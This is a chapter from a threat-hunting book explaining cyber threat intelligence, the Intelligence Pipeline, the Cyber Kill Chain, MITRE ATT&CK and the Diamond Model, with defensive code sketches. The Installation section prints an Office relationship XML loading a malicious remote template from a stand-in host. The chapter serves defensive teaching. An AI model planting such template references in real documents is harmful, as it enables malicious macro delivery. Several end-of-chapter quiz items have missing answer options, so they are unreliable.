Generally speaking, there are a few "shiny penny" terms in modern IT – blockchain, artificial intelligence, and the dreaded single pane of glass are classic examples. Cyber Threat Intelligence (CTI) and threat hunting are no different. While all of these concepts are tremendously valuable, the terms are commonly used for figurative hand-waving by marketing and sales teams to procure a meeting with the C-suite. With that in mind, let's discuss what CTI and threat hunting are in practice, rather than as umbrella terms for all things security.
Through the rest of this book, we'll refer back to the theories and concepts that we cover here. This chapter focuses heavily on critical thinking, reasoning processes, and analytical models; understanding these is paramount because threat hunting is not linear. It involves constant adaptation, with a live adversary on the other side of the keyboard. As hard as you are working to detect them, they are working just as hard to evade detection. As we'll discover as we progress through the book, knowledge is important, but being able to adapt to a rapidly changing scenario is crucial to success.
In this chapter, we'll go through the following topics:
- What is cyber threat intelligence?
- The Intelligence Pipeline
- The Lockheed Martin Cyber Kill Chain
- MITRE's ATT&CK Matrices
- The Diamond Model
What is cyber threat intelligence?
When we talk about traditional SecOps, we're referring to the deployment and management of various types of infrastructure and defensive tools – think firewalls, intrusion detection systems, vulnerability scanners, and antivirus software. This also includes some of the less exciting elements, such as policy, and processes such as privacy and incident response (not to say that incident response isn't an absolute blast). Copious publications describe traditional SecOps, and I'm certainly not going to try to re-write them. However, to grow and mature as a threat hunter, you need to understand where CTI and threat hunting fit into the big picture.
When we talk about CTI, we mean the processes of collection, analysis, and production that transition data into information and, finally, into intelligence (we'll discuss technologies and methodologies for doing this later), in support of operations to detect activity that evades automated defenses. Threat hunting searches for adversary activity that cannot be detected by traditional signature-based defensive tools, mainly by profiling endpoint and network activity and detecting patterns within it. Combined, CTI and threat hunting are the processes of identifying adversary techniques and their relevance to the network being defended, generating profiles and patterns within data to identify when someone may be using those techniques, and – this is the often-overlooked part – leading to data-driven decisions.
A great example would be identifying that abusing authorized binaries, such as PowerShell or GCC, is a technique used by adversaries. In this example, both PowerShell and GCC are expected to be on the system, so their existence or usage wouldn't cause a host-based detection system to generate an alert. So CTI processes would identify that this is a tactic used by adversaries, threat hunting would profile how these binaries are used in a defended network, and finally, this information would be used to inform active response operations or recommendations to improve the enduring defensive posture.
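As a minimal sketch of that profiling idea (the telemetry fields, process names, and baseline here are all hypothetical), a hunt could flag PowerShell launches whose parent process falls outside what has historically been observed:

```python
from collections import Counter

# Hypothetical endpoint telemetry: (parent process, child process) pairs.
observed = [
    ("explorer.exe", "powershell.exe"),
    ("explorer.exe", "powershell.exe"),
    ("svchost.exe", "powershell.exe"),
    ("winword.exe", "powershell.exe"),  # Word spawning PowerShell is unusual
]

# Baseline: parents historically seen launching PowerShell in this network.
baseline_parents = {"explorer.exe", "cmd.exe", "svchost.exe"}

def hunt_unusual_parents(events, baseline):
    """Return counts of PowerShell launches whose parent is outside the baseline."""
    counts = Counter(parent for parent, child in events if child == "powershell.exe")
    return {parent: n for parent, n in counts.items() if parent not in baseline}

print(hunt_unusual_parents(observed, baseline_parents))  # {'winword.exe': 1}
```

In practice, the baseline would be built from weeks of endpoint telemetry rather than a hardcoded set, but the shape of the hunt is the same: profile normal usage, then surface the outliers for analyst review.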
Of particular note is that while threat hunting is an evolution from traditional SecOps, that isn't to say that it is inherently better. They are two sides of the same coin. Understanding traditional SecOps and where intelligence analysis and threat hunting should be folded into it is paramount to being successful as a technician, responder, analyst, or leader. In this chapter, we'll discuss the different parts of traditional security operations and how threat hunting and analysis can support SecOps, as well as how SecOps can support threat hunting and incident response operations:
Figure 1.1 – The relationship between IT and cyber security
In the following sections, we'll discuss several models, both industry-standard ones and my own, along with my thoughts on them, their individual strengths and weaknesses, and their applicability. It is important to remember that models and frameworks are just guides: they help identify research and defensive prioritizations and incident response processes, and they provide tools to describe campaigns, incidents, and events. Analysts and operators get into trouble when they try to use models that are, in reality, purely linear and rigid as one-size-fits-all solutions.
The models and frameworks that we'll discuss are as follows:
- The Intelligence Pipeline
- The Lockheed Martin Kill Chain
- The MITRE ATT&CK Matrix
- The Diamond Model
Finally, we'll discuss how the models and frameworks are most impactful when they are chained together instead of being used independently.
The Intelligence Pipeline
Threat hunting is more than comparing provided indicators of compromise (IOCs) to collected data and finding a "known bad." Threat hunting relies on the application and analysis of data into information and then into intelligence – this is known as the Intelligence Pipeline. To process data through the pipeline, there are several proven analytical models that can be used to understand where an adversary is in their campaign, where they'll need to go next, and how to prioritize threat hunting resources (mainly, time) to disrupt or degrade an intrusion.
The Intelligence Pipeline isn't my invention. I first read about it in an extremely nerdy traditional intelligence-doctrine publication from the United States Joint Chiefs of Staff, JP 2-0 (https://www.jcs.mil/Portals/36/Documents/Doctrine/pubs/jp2_0.pdf). In this document, this process is referred to as the Relationship of Data, Information, and Intelligence process. However, as I've taken it out of that document and made some adjustments to fit my experiences and the cyber domain, I feel that the Intelligence Pipeline is more apt. It is the pipeline and process that you use to inform data-driven decisions:
Figure 1.2 – The Intelligence Pipeline
The idea of the pipeline is to introduce the theory that intelligence is made, not provided. This is anathema to vendors selling the product of "actionable intelligence." I should note that selling data or information isn't wrong (in fact, it's required in one form or another), but you should know precisely what you're getting – that is, data or information, not intelligence.
As illustrated, the operating environment is everything – your environment, the environment of your trust relationships, the environment of your MSSP, and so on. From here, events go through the following processes:
- Events are collected and processed to turn them into data.
- Context and enrichment are added to turn the data into information.
- Internal analysis and production are applied to the information to create intelligence.
- Data-driven decisions can be created (as necessary).
As an example, you might be informed that "this IP address was observed scanning for exposed unencrypted ports across the internet." This is data, but that's all it is. It isn't really even interesting. It's just the "winds of the internet." Ideally, this data would have context applied, such as "this IP address is scanning for exposed unencrypted ports across the internet for ASNs owned by banks"; additionally, the enrichment added could be that this IP address is associated with the command and control entities of a previously observed malicious campaign.
So now we know that a previously identified malicious IP address is scanning financial services organizations for unencrypted ports. This is potentially interesting as it has some context and enrichment, and is perhaps very interesting if you're in the financial services vertical; this is information and is on its way to becoming intelligence. This is also where most vendors lose their ability to provide additional value. That's not to say that this information isn't valuable, but an answer to "did this IP address scan my public environment, and do I have any unencrypted exposed ports?" requires a level of analysis and production that an external party (generally) cannot provide. This is where you, the analyst or the operator, come in to create intelligence. To do this, you need a few things, most notably your own endpoint and network observations, so that you can inform a data-driven decision about what your threat, risk, and exposure could be – and, no less importantly, make some recommendations on how to reduce them. The skills covered later in this book will show how to do this.
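The pipeline stages in this example can be sketched as a few small transformations (the field names and threat feed here are all hypothetical):

```python
# Hypothetical event and threat feed illustrating the pipeline stages.
raw_event = {"src_ip": "203.0.113.7", "dst_port": 21, "action": "scan"}

def add_context(data):
    # Context: what the activity was aimed at (assumed lookup result).
    return dict(data, target_vertical="financial services")

def add_enrichment(data, threat_feed):
    # Enrichment: external knowledge about the observable.
    return dict(data, known_c2=data["src_ip"] in threat_feed)

def analyze(info, our_exposed_ports):
    # Internal analysis and production: does this matter to *our* environment?
    relevant = info["known_c2"] and info["dst_port"] in our_exposed_ports
    return dict(info, assessment="investigate" if relevant else "monitor")

feed = {"203.0.113.7"}  # previously observed C2 addresses
intelligence = analyze(add_enrichment(add_context(raw_event), feed), {21, 23})
print(intelligence["assessment"])  # investigate
```

The point of the sketch is the last step: only analysis against your own environment (here, the set of exposed ports) turns enriched information into something a decision can be made on.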
As an internal organization, you rarely have the resources at your disposal to collect the large swaths of data needed to (eventually) generate intelligence. Additionally, adding context and enrichment at that scale is monumentally expensive in terms of personnel, technology, and capital. So acquiring those services from industry partnerships, generic or vertical-specific Information Sharing and Analysis Centers (ISACs), government entities, and vendors is paramount to having a solid intelligence and threat hunting program. To restate what I mentioned previously, buying or selling "threat intelligence" isn't bad – it's necessary; you just need to know that what you're receiving isn't a magic bullet and almost certainly isn't "actionable intelligence" until it has been analyzed into an intelligence product by internal resources, so that decision-makers are properly informed when formulating their response.
The Lockheed Martin Cyber Kill Chain
Lockheed Martin is a United States technology company in the Defense Industrial Base (DIB) that, among other things, created a response model to identify the activities that an adversary must carry out to successfully complete a campaign. This model was one of the first to hit the mainstream that provided analysts, operators, and responders with a way to map an adversary's campaign. Once any adversary activity was detected, this mapping provided a roadmap outlining how far into the campaign the adversary had gotten, what actions had not been observed yet, and (during incident recovery) what defensive technology, processes, or training needed to be prioritized.
An important note regarding the Lockheed Martin Cyber Kill Chain: it is a high-level model used to illustrate adversary campaign activity. Many tactics and techniques can cover multiple phases, so as we discuss the model below, the examples will be large buckets instead of specific tactical techniques. Easy examples of this would be supply chain compromises and abusing trust relationships – fairly complex techniques that can be used in many different phases of a campaign (or chained between campaigns or phases). Fear not, we'll look at a more specific model (the MITRE ATT&CK framework) later in this chapter.
Figure 1.3 – Lockheed Martin's Cyber Kill Chain
- Reconnaissance
- Weaponization
- Delivery
- Exploitation
- Installation
- Command & Control
- Actions on the Objective
Let's look at each of them in detail in the following sections.
Reconnaissance
The Reconnaissance phase is performed when the adversary is mapping out their target. This phase is performed both actively and passively through network and system enumeration, social media profiling, identifying possible vulnerabilities, identifying the protective posture (including the security teams) of the targeted network, and identifying what the target has that may be of value. Does your organization have intellectual property? Are you a part of the DIB? Are you part of a supply chain that could be used for a further compromise? Do you hold personally identifiable or health information (PII/PHI)?
Weaponization
Weaponization is one of the most expensive parts of the Kill Chain for the adversary. This is when they must go into their arsenal of tools, tactics, and techniques and identify exactly how they are going to leverage the information collected in the previous phase to achieve their objectives. It's a potentially expensive phase that doesn't leave much room for error. Do they use their bleeding-edge zero-day exploits (that is, exploits that have not been previously disclosed), thus making them unusable in other campaigns? Do they use malware, or a Living-Off-the-Land Binary (LOLBin)? Do too much and they waste the resources (personnel, capital, and time) needed to develop zero-days and complex malware; do too little and they risk getting caught and exposing their attack vehicle.
This phase is also where adversaries acquire infrastructure: to perform the initial entry, stage and launch payloads, perform command and control, and, if needed, provide an exfiltration landing spot. Depending on the complexity of the campaign and the skill of the adversary, infrastructure is either stolen (exploiting and taking over a benign website as a launch/staging point) or purchased. Frequently, infrastructure is stolen because it is easier to blend in with the normal network traffic of a legitimate website. Additionally, when you steal infrastructure, you don't have to pay for things that can be traced back to the actor (domain registrations, TLS certificates, hosting, and so on).
Delivery
This phase is where the adversary makes their attempt to get into the target network. Frequently, this is attempted through phishing (generic, spear-, or whale-phishing, or even through social media). However, this can also be attempted through an insider, a hardware drop (the oddly successful thumb drive in a parking lot), or a remotely exploitable vulnerability.
Generally, this is the riskiest part of a campaign as it is the first time that the adversary is "reaching out and touching" their target with something that could tip off defenders that an attack is incoming.
Exploitation
This phase is performed when the adversary actually exploits the target and executes code on the system. This can be through the use of an exploit against a system vulnerability, against the user, or any combination of the lot. An exploit against a system vulnerability is fairly self-explanatory – it is either triggered by tricking the user into opening an attachment or link that creates an exploit condition (Arbitrary Code Execution (ACE)), or it is exploitable over the network without user interaction (Remote Code Execution (RCE)).
The Exploitation phase is generally the first time that you may notice adversary activity as the Delivery phase relies on organizations getting data, such as email, into their environment. While there are scanners and policies to strip out known bad, adversaries are very successful in using email as an initial access point, so the Exploitation phase is frequently where the first detection occurs.
Installation
This phase is when an initial payload is delivered as a result of the exploitation of the weaponized object that was delivered to the target. Installation generally has multiple sub-phases, such as loading multiple tools/droppers onto the target that will assist in maintaining a foothold on the system, so that the adversary doesn't lose a valuable piece of malware (or other malicious logic) to a lucky anti-virus detection.
As an example, the exploit may be to get a user to open a document that loads a remote template that includes a macro. When the document is opened, the remote template is loaded and brings the macro with it over TLS. Using this example, the email with the attachment looked like normal correspondence and the adversary didn't have to risk losing a valuable macro-enabled document to an email or anti-virus scanner:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="ird4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file:///C:\Users\user\AppData\Roaming\Microsoft\Templates\GoodTemplate.dotm" TargetMode="External"/></Relationships>
In the preceding snippet, we can see the template relationship from a normal Microsoft Word document. Specifically, take note of the Target="file:///" section, which defines the local template (GoodTemplate.dotm). In the following snippet, an adversary, using the same Target= syntax, is loading a remote template that includes malicious macros. Loading remote templates is allowed within the document standards, which makes this a prime candidate for abuse:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="ird4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://example.com/EvilTemplate.dotm" TargetMode="External"/></Relationships>
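A hunt for this technique can be sketched by inspecting a document's relationship files for external template targets. This is a minimal sketch – real .docx parsing has more edge cases, and the archive path and URL below are stand-ins:

```python
import io
import re
import zipfile

def find_remote_templates(docx_bytes):
    """Scan a .docx (a ZIP archive) for relationship entries whose Target
    points at a remote URL - a hint of remote template injection."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith(".rels"):
                xml = zf.read(name).decode("utf-8", errors="replace")
                hits += re.findall(r'Target="(https?://[^"]+)"', xml)
    return hits

# Build a tiny stand-in document to demonstrate the check.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr(
        "word/_rels/settings.xml.rels",
        '<Relationships><Relationship Id="rId1" '
        'Target="https://example.com/EvilTemplate.dotm" '
        'TargetMode="External"/></Relationships>',
    )
print(find_remote_templates(buf.getvalue()))  # ['https://example.com/EvilTemplate.dotm']
```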
This can go on for several iterations, each one more difficult to track, using encryption and obfuscation to hide the actual payload, until the adversary finally has sufficient cover and access to proceed without concern for detection.
As a real-world example, during an incident, I observed an adversary use an encoded PowerShell script to download another encoded PowerShell script from the internet, decode it, and that script then downloaded another encoded PowerShell script, and so on, to eventually download five encoded PowerShell scripts, at which point the adversary believed they weren't being tracked (spoiler: they were).
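Unwrapping one layer of such encoding is straightforward once the command line has been captured – PowerShell's -EncodedCommand argument takes Base64-encoded UTF-16LE. A minimal sketch, using a harmless stand-in payload:

```python
import base64

def decode_powershell(encoded: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE)."""
    return base64.b64decode(encoded).decode("utf-16-le")

# A harmless stand-in payload, encoded the same way an adversary would encode theirs.
inner = "Write-Output 'stage two'"
blob = base64.b64encode(inner.encode("utf-16-le")).decode()
print(decode_powershell(blob))  # Write-Output 'stage two'
```

An analyst repeats this (plus whatever other decoding each stage uses) layer by layer, just as in the incident described here.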
Command & Control
The Command & Control (C2) phase is used to establish remote access over the implant, and ensure that it is able to evade detection and persist through normal system operation (reboots, vulnerability/anti-virus scans, user interaction with the system, and so on).
Other phases tend to move fairly quickly; however, with advanced adversaries, the Installation and C2 phases tend to slow down to avoid detection, often remaining dormant between phases or sub-phases (sometimes using the multiple dropper downloads technique described previously).
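One way to hunt for C2 during these slower phases is to look for beaconing – implants that check in at near-regular intervals. A minimal sketch (the timestamps and jitter threshold are illustrative):

```python
from statistics import mean, pstdev

def looks_like_beacon(timestamps, max_jitter_ratio=0.1):
    """Flag a series of connection times whose intervals are suspiciously regular."""
    deltas = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(deltas) < 3:
        return False  # too few observations to judge
    return pstdev(deltas) / mean(deltas) < max_jitter_ratio

# Check-ins every ~60 seconds versus irregular, human-driven traffic.
implant = [0, 60, 121, 180, 241, 300]
human = [0, 5, 90, 97, 400, 420]
print(looks_like_beacon(implant), looks_like_beacon(human))  # True False
```

Real beacon detection has to contend with jitter deliberately added by the adversary, so a threshold like this is a starting point for a hunt, not a verdict.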
Actions on the Objective
This phase is when the adversary performs the true goal of their intrusion. This can be the end of the campaign or the beginning of a new phase. Traditional objectives range from loading annoying adware to deploying ransomware or exfiltrating sensitive data. However, it is important to remember that the access itself could be the objective, with implants sold to bad actors on the dark/deep web who could use them for their own purposes.
As noted, this can launch into a new campaign phase and begin by restarting from the Reconnaissance phase from within the network to collect additional information to dig deeper into the target. This is common with compromises of Industrial Control Systems (ICSes) – these systems aren't (supposed to be) connected to the internet, so frequently you have to get onto a system that does access the internet and then use that as a foothold to access the ICS, thus starting a new Kill Chain process.
Our job as analysts, operators, and responders is to push the adversary as far back into the chain as possible to the point that the expense of attacking outweighs the value of success. Make them pay for every bit they get into our network and it should be the last time they get in. We should identify and share every piece of infrastructure we detect. We should analyze and report every piece of malware or LOLBin tactic we uncover. We should make them burn zero-day after zero-day exploit, only for us to detect and stop their advance. Our job is to make the adversary work tremendously hard to make any advance in our network.
MITRE's ATT&CK Matrices
The MITRE Corporation is a not-for-profit organization that performs federally funded research and development for several United States government agencies. One of the many contributions they have made to cyber security is a series of detailed, tactical matrices used to describe adversary activities, known as the Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) matrices. There are three main matrices: Enterprise, Mobile, and ICS.
The Enterprise Matrix includes tactics and techniques focused on preparatory phases (similar to the Reconnaissance and Weaponization phases from the Lockheed Martin Cyber Kill Chain), traditional operating systems, ICSes, and network-centric adversary tactics.
The matrices are paired with another MITRE project known as the Cyber Analytics Repository (CAR), which is focused purely on detection analytics for adversary behavior. The ATT&CK matrices provide an abstraction that allows you to view those analytics by technique and by tactic.
All of the matrices use a grouping schema of tactic, technique, and in the case of the Enterprise Matrix, sub-technique. When thinking about the differences between a tactic, a technique, and an analytic, all three of these elements describe aggressor behavior in a different, but associated, context:
- A tactic is the highest level of the actor's behavior (what they want to achieve – initial access, execution, and so on).
- A technique is more detailed and carries the context of the tactic (what they are going to use to achieve their tactic – spear phishing, malware, and so on).
- An analytic is a highly detailed description of the behavior and carries with it the context of the technique (for instance, the attacker will send an email with malicious content to achieve the initial access).
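This hierarchy maps naturally onto nested data. As a small sketch (the tactic and technique IDs shown are real ATT&CK identifiers; the structure itself is illustrative):

```python
# Tactic -> technique -> sub-technique, mirroring the ATT&CK grouping schema.
attack = {
    "TA0001": {
        "name": "Initial Access",
        "techniques": {
            "T1566": {
                "name": "Phishing",
                "sub_techniques": {
                    "T1566.001": "Spearphishing Attachment",
                    "T1566.002": "Spearphishing Link",
                },
            }
        },
    }
}

def describe(tactic_id, technique_id, sub_id):
    """Render one tactic/technique/sub-technique chain as readable text."""
    tactic = attack[tactic_id]
    technique = tactic["techniques"][technique_id]
    return f'{tactic["name"]} via {technique["name"]}: {technique["sub_techniques"][sub_id]}'

print(describe("TA0001", "T1566", "T1566.001"))
# Initial Access via Phishing: Spearphishing Attachment
```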
The tactics across the matrices are as follows:
- Reconnaissance (PRE matrix only) – Techniques for information collection on the target
- Resource Development (PRE matrix only) – Techniques for infrastructure acquisition and capabilities development
- Initial Access – Techniques to gain an initial foothold into a target environment
- Execution – Techniques to execute code within the target environment
- Persistence – Techniques that maintain access to the target environment
- Privilege Escalation – Techniques that escalate access within the target environment
- Defense Evasion – Techniques to avoid being detected
- Credential Access – Techniques to acquire internal/additional account credentials
- Discovery – Techniques to learn more about the target environment (networks, services, and so on)
- Lateral Movement – Techniques to expand access beyond the initial entry point
- Collection – Techniques to collect information or data for follow-on activities
- Command and Control – Techniques to control implants within the target environment
- Exfiltration – Techniques to steal collected data from the target environment
- Impact – Techniques to deny, degrade, disrupt, or destroy assets, processes, or operations within the target environment
Within these high-level tactics, there are multiple techniques and sub-techniques used to describe the adversary's actions. Two example techniques and sub-techniques (of the nine techniques available) in the Initial Access tactic are as follows:
Table 1.1 – An example of the MITRE ATT&CK tactic, technique, and sub-technique relationship
Figure 1.4 – An example of the MITRE ATT&CK framework in the Elastic Security app
As we can see, MITRE's ATT&CK matrices are much more detailed than the Lockheed Martin Cyber Kill Chain, but that isn't to say that one is necessarily better than the other; both have their uses. As an example, when producing technical writing or briefings, being able to describe that the adversary's Resource Development tactic included the technique of them developing capabilities, and exploits specifically, is valuable; however, if the audience isn't too technical, simply being able to state that the adversary weaponized their attack (using the Lockheed Martin Kill Chain) could be easier to understand.
The Diamond Model
The Diamond Model (The Diamond Model of Intrusion Analysis, Sergio Caltagirone, Andrew Pendergast, and Christopher Betz, https://apps.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf) was created by a non-profit organization called the Center for Cyber Intelligence Analysis and Threat Research (CCIATR). The paper, titled The Diamond Model of Intrusion Analysis, was released in 2013 with the novel goal of providing a standardized approach to characterize campaigns, differentiate one campaign from another, track their life cycles, and, finally, develop countermeasures to mitigate them.
The Diamond Model uses a simple visual to illustrate six elements valuable for campaign tracking: Adversary, Infrastructure, Victim, Capabilities, Socio-political, and Tactics, Techniques, and Procedures (TTP).
Adversary (a)
This element describes the threat actor involved in the campaign, either directly or indirectly. This can include individual names, organizations, monikers, handles, social media profiles, code names, addresses (physical, email, and so on), telephone numbers, employers, network-connected assets, and so on. Essentially, these are the features that you can use to describe the bad guy.
Network-connected assets can fall into either an adversary or infrastructure node depending on the context. A computer named cruisin-box may be used by the adversary for leisure activities on the internet and be used to describe the person, while hax0r-box may be used by the adversary for network attack and exploitation campaigns and be used to describe the attack infrastructure.
Infrastructure (i)
This element describes the adversary-controlled infrastructure leveraged in the campaign. This can include things such as IP addresses, hostnames, domain names, email addresses, network-connected assets, and so on. As we track the life cycle of the campaign and map the Diamond Model to the Lockheed Martin Kill Chain, and even to MITRE's ATT&CK matrices, the infrastructure can start as an external entity but quickly become an internal one.
Victim (v)
This element describes the victim targeted in the campaign. This can cover the same things as the Adversary element, but within the context of the victim rather than the adversary – again, individual names, organizations, and so on. The victim's network-connected assets are included here if they are relevant to the campaign, while adversary-controlled network assets may be included as part of the Adversary or Infrastructure nodes depending on the context, as described previously.
Capabilities (c)
This element describes the capabilities leveraged in the campaign. There is certainly value in cataloging capabilities that the analyst knows are available to the adversary but, generally, the Capabilities node describes the observed capabilities.
I would be remiss to skip over the motivational vertices. These are hugely valuable in describing high-level campaign objectives and are used to help describe how the capabilities and infrastructure relate to, and are leveraged by, one another.
In espionage, actor motivations are distilled into the four categories of MICE (Money, Ideology, Coercion, and Ego), and I think that they make sense in cyber security too:
Money is used as a motivating factor through the collection of capital for work performed. This capital can be a few different things including cash, gifts, status, political position, and so on. A large majority of attackers are likely to fall under the money category; they launch attacks to get money for extortion, selling access or data, or other such campaign objectives that result in making money as a result of their intrusion.
Ideology is a motivating factor in that an actor believes in a specific cause or has fierce patriotism, believing that they should carry out offensive actions either to further their cause or national strategic interests.
Coercion is a motivating factor in that an actor is in some sort of situation that can be used as leverage to force them to carry out offensive actions. Examples of leverage include a secret, sick family members, or previous actions they have performed.
Ego is a motivating factor in that an actor believes that they are more skilled than their peers (if they believe they have any), believes that they have been marginalized, or simply seeks to catalog their exploits for "internet points."
Figure 1.5 – The Diamond Model
While we look at MICE to represent threat actor motivations, it is important to remember that defenders usually do their work on the other side of the keyboard for much the same reasons of money, ideology, and/or ego, and much less commonly, coercion.
In campaign tracking, there is certainly value in describing the different nodes of the Diamond Model, but there are also the edges, which show how the nodes are associated with one another. If you look through the preceding discussion, you'll see that there is a single letter next to each node ((a)dversary, (i)nfrastructure, (v)ictim, and (c)apabilities). We can use these to describe the direction of the node relationships in the campaign, which can improve response activities, mitigations, and resource prioritization by revealing how the adversary is moving throughout the campaign. Different directionalities include Victim-to-Infrastructure (v2i), Infrastructure-to-Victim (i2v), Infrastructure-to-Infrastructure (i2i), Adversary-to-Infrastructure (a2i), and Infrastructure-to-Adversary (i2a).
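These directed relationships can be sketched as a small labeled graph (the campaign events here are hypothetical):

```python
# Nodes use the single-letter shorthand: (a)dversary, (i)nfrastructure,
# (v)ictim, (c)apabilities; each observed event records its direction.
events = [
    ("a", "i", "registers a staging domain"),       # a2i
    ("i", "v", "delivers a phishing email"),        # i2v
    ("v", "i", "victim host beacons to C2"),        # v2i
    ("i", "a", "adversary retrieves stolen data"),  # i2a
]

def directions(evts):
    """Summarize each event's node-to-node directionality, e.g. 'i2v'."""
    return [f"{src}2{dst}" for src, dst, _ in evts]

print(directions(events))  # ['a2i', 'i2v', 'v2i', 'i2a']
```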
Strategic, operational, and tactical intelligence
We've discussed several analytical models that can help frame strategic, operational, and tactical operations – be that intelligence, hunting, or traditional SecOps. While there are individual books that have been written about each of these frameworks and models, and while we have just introduced them, it is also important to understand how they are all related and that each model can be overlaid on another.
Before we talk about stitching models together, there is another concept to describe, and that is Strategic, Operational, and Tactical. There have been a few different approaches to describing these phases, and to be honest, I think that they all probably work as long as you're taking a uniform approach and applying the thought processes the same way across all of your analytical processes and models. I choose to describe these high-level elements as follows:
- Strategic – Who is launching this campaign and why are they doing it?
- Operational – What is happening throughout this campaign?
- Tactical – How did the adversary carry out the campaign?
Each of these three elements has a great deal of analysis that can go into research to understand them for each campaign.
There are a few different ways to analyze information across models. As an example, here is a way you could combine the Intelligence Pipeline with elements of the Diamond Model, and strategic/operational/tactical observations:
Table 1.2 – The Intelligence Pipeline and the Diamond Model
You can use this kind of table to help structure and prioritize your research and response efforts. This becomes even more helpful when you're thinking about your collection strategy, hopefully before an event starts. As you fill this table out, you'll learn more about your adversary, the campaign, your capabilities, and where the opportunities are to frustrate a current or future adversary.
Another method for chaining models together is to combine the Lockheed Martin Cyber Kill Chain and the Diamond Model. This allows you to associate adversary actions mapped with the Diamond Model with other parallel campaigns, note shared elements between events and campaigns, produce confidence assessments based on your inferences, and also determine how far the adversaries may be in their campaigns:
Figure 1.6 – The Diamond Model and the Lockheed Martin Kill Chain (Source: The Diamond Model of Intrusion Analysis, Caltagirone, Sergio ; Pendergast, Andrew ; Betz, Christopher, https://apps.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf)
I do understand that this book isn't specifically just about intelligence analysis, but as I mentioned at the beginning of the chapter, only when you tightly couple intelligence analysis, processes, methodologies, and traditional SecOps can you begin threat hunting. So the introduction to these models was really meant to help put you in the right mindset to approach threat hunting analytically, strategically, operationally, and tactically, and also to highlight that this is a team sport.
Understanding how to track, identify, and evict an adversary from a contested network involves many different skills. While the technical skills can obviously not be overlooked, being able to understand the adversary, their motivations, their goals and objectives, and how they use the tools at their disposal is paramount to a mature intelligence, threat hunting, and security program. In this chapter, we learned about various models that can be used to gain an understanding of how a campaign may unfold and how the application and execution of those models can lead to proactive responses instead of always chasing artifacts. These lessons will continue to be reinforced as we progress through the book and will lead to a far deeper understanding of investigating security events.
In the next chapter, we will have an introduction to threat hunting, discuss how to profile data to identify deviations and the importance of doing so, describe the data patterns of life, and examine the overall threat hunting methodologies that will be put to use as we progress through the book.
As we conclude, here is a list of questions for you to test your knowledge regarding this chapter's material. You will find the answers in the Assessments section of the Appendix:
- What is cyber threat intelligence?
a. Processes and methodologies that replace traditional SecOps
b. The new name for SecOps, but essentially the same
c. Processes and methodologies tightly coupled with, and in support of, traditional SecOps
d. Processes to acquire third-party threat feeds
- Which stage of the Intelligence Pipeline adds context and enrichment?
b. Data-driven decisions
- In which phase of the Lockheed Martin Kill Chain do adversaries first attempt to exploit their target?
c. Command & Control
d. Actions on the Objective
- Which MITRE ATT&CK tactic includes techniques to expand access beyond the initial entry point?
a. Lateral Movement
c. Credential Access
d. Defense Evasion
- In the Diamond Model, which element describes adversary-controlled assets?
To learn more about applied intelligence as it relates to cyberspace, check out these resources:
- The Diamond Model of Intrusion Analysis, Sergio Caltagirone, Andrew Pendergast, and Christopher Betz, http://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf
- The Pyramid of Pain, David Bianco, http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
- Psychology of Intelligence Analysis, Richards Heuer, Pherson Associates, LLC